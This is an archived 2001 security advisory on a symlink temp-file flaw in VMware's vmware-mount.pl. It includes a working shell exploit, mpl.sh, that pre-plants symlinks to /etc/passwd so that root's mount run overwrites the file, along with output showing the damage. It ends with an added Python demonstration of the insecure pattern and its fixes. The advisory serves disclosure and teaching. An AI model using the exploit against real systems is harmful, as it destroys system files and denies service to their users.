1. Problem description
----------------------

There is a symlink vulnerability in the vmware-mount.pl script which comes with the latest VMware.

2. Details
----------

While mounting virtual disk drives using the vmware-mount.pl script, a temporary file named vmware-mount.pl.PID, where PID is the current pid of the command, is created in an insecure manner. This allows an attacker to overwrite any local file if root mounts a VMware virtual partition (mounting is usually done as root).

Example:

paul@ps:/tmp > id
uid=500(paul) gid=100(users) Gruppen=100(users),90(firewall)
paul@ps:/tmp > ./mpl.sh

VMware local /etc/passwd DoS
By Ihq.

 linking /etc/passwd to /tmp
[+] please wait for root to run vmware-mount.pl

after running vmware-mount.pl:

paul@ps:/tmp > id
uid=500 gid=100(users) Gruppen=100(users),90(firewall)

Obviously the passwd file has been overwritten:

paul@ps:/tmp > cat /etc/passwd
Nr Start      Size       Type Id Sytem
-- ---------- ---------- ---- -- ------------------------
 1         63    2096577 BIOS  C Win95 FAT32 (LBA)

I'm not sure if it is exploitable for privilege elevation.

3. Impact
---------

Local file corruption.

---------------------- mpl.sh ----------------------

#!/bin/bash
declare -i n
declare -i mx
n=2
mx=32767
echo
echo "VMware local /etc/passwd DoS"
echo "By Ihq."
echo
echo " linking /etc/passwd to /tmp"
# one symlink per possible PID, so whichever vmware-mount.pl.PID root creates already points at /etc/passwd
while test $n -lt $mx ; do
  ln -s /etc/passwd /tmp/vmware-mount.pl.$n
  n=$(($n + 1))
done
echo "[+] please wait for root to run vmware-mount.pl"
echo
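The root cause above is a predictable temp-file name opened for writing without symlink protection. The following added example (not part of the advisory or of VMware's script) reproduces the planted-symlink scenario in a private scratch directory and shows the two defensive changes that stop it: opening with O_CREAT|O_EXCL|O_NOFOLLOW so a pre-existing link is refused, and letting the OS choose an unpredictable name via mkstemp. The file names, pid value and sample contents are constructed for the demonstration.

```python
import errno
import os
import tempfile

# Insecure pattern from the advisory: a predictable name (prog.PID) is opened for
# writing; if an attacker pre-planted a symlink there, open(2) follows it.
def insecure_tempfile_write(path, data):
    with open(path, "w") as f:
        f.write(data)

# Hardened variant: O_EXCL fails with EEXIST if anything (a symlink included) already
# exists at the path, and O_NOFOLLOW refuses to traverse a symlink at the final component.
def secure_tempfile_write(path, data):
    flags = os.O_WRONLY | os.O_CREAT | os.O_EXCL | getattr(os, "O_NOFOLLOW", 0)
    fd = os.open(path, flags, 0o600)
    with os.fdopen(fd, "w") as f:
        f.write(data)

def demo(pid=4242):
    """Replays the attack against a stand-in for /etc/passwd inside a temp dir."""
    result = {}
    passwd_line = "root:x:0:0:root:/root:/bin/bash\n"   # constructed sample
    with tempfile.TemporaryDirectory() as tmp:
        victim = os.path.join(tmp, "passwd")            # stands in for /etc/passwd
        with open(victim, "w") as f:
            f.write(passwd_line)
        planted = os.path.join(tmp, f"vmware-mount.pl.{pid}")
        os.symlink(victim, planted)                     # the pre-planted link

        insecure_tempfile_write(planted, "Nr Start Size Type Id System\n")
        with open(victim) as f:
            result["insecure_clobbered"] = f.read().startswith("Nr Start")

        with open(victim, "w") as f:                    # restore the victim
            f.write(passwd_line)
        try:
            secure_tempfile_write(planted, "Nr Start Size Type Id System\n")
            result["secure_refused"] = False
        except OSError as e:
            result["secure_refused"] = e.errno in (errno.EEXIST, errno.ELOOP)
        with open(victim) as f:
            result["victim_intact"] = f.read() == passwd_line

        # The full remedy: an unpredictable name chosen by the OS, created with O_EXCL.
        fd, path = tempfile.mkstemp(prefix="vmware-mount.pl.", dir=tmp)
        os.close(fd)
        result["mkstemp_unpredictable"] = path != planted
    return result

if __name__ == "__main__":
    print(demo())
```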
This archive was generated by hypermail 2b30 : Thu Apr 19 2001 - 10:50:24 PDT